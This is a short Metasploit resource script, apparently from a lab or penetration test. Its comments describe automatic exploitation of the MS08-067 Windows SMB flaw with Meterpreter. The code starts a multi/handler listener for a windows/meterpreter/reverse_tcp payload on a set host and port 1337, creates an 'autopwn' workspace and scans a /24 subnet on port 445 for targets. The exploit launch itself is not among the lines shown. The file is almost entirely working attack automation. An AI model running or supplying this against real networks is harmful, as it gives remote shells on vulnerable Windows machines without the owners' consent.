# Resource file for metasploit
# Auto exploits using ms08_067 and metrepreter
# Used db_nmap to check port 445
# Sets msfhandler
# Version 0.1
 
 
 
<ruby>
 
# Setting up variables
lhost = "172.16.11.11"
lport = "1337"
exploit = "exploit/multi/handler"
payload = "windows/meterpreter/reverse_tcp"
targets = "172.16.11.0/24"
port = "445"
 
# Starting Mulit-Handler
run_single("use #{exploit}")
run_single("set PAYLOAD #{payload}")
run_single("set LHOST #{lhost}")
run_single("set LPORT #{lport}")
run_single("set ExitOnSession false")
run_single("exploit -j -z")
 
# Setup Workspace
run_single("workspace -d autopwn")
run_single("workspace -a autopwn")
run_single("workspace autopwn")  #probably redundant
 
# Runs NMAP
run_single("db_nmap -p #{port} #{targets}")
 
</ruby>
